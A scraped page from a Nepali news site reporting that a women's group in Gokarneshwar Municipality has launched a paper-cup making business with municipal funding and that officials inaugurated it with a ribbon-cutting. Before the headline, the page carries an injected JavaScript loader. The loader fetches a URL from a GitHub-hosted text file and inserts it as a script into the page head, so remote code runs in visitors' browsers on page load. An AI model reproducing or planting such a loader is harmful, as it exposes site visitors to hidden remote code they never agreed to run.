;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); गोकर्णेश्वरको अर्को महिला समूहले सुरु गरे पेपर कप बनाउने उद्योग – जुनेली न्युज
मङ्लबार, बैशाख ३, २०८२
  • होमपेज
  • गोकर्णेश्वरको अर्को महिला समूहले सुरु गरे पेपर कप बनाउने उद्योग
Breaking News

गोकर्णेश्वरको अर्को महिला समूहले सुरु गरे पेपर कप बनाउने उद्योग

जुनेली न्यूज, काठमाडौं।

गोकर्णेश्वर नगरपालिका वडा नं ५ नवज्योति महिला समूहले पेपरको कप बनाउने व्यवसाय सुरु गरेका छन्।  महिलाहरुको आर्थिक उन्नति होस भन्ने उद्देश्यले गोकर्णेश्वर नगरपालिकाले आर्थिक सहयोग गरेको छ।

आज संघीय सांसद तथा अर्थ समितिका सभापति सन्तोष चालिसे, नगर प्रमुख दिपक रिसाल, उप प्रमाउख सान्नानी लामा, वडा अध्यक्ष तथा नगर प्रवक्ता नारायण सुवेदी, वडा अध्यक्ष नवराज लामा सहितको उपस्थितिमा टोलमा एक कार्यक्रम गरेर संयुक्त रुपमा रिबन काटेर पेपर कप बनाउने मेसिनको उद्घाटन गरिएको थियो।

फेसबुक प्रतिक्रियाहरु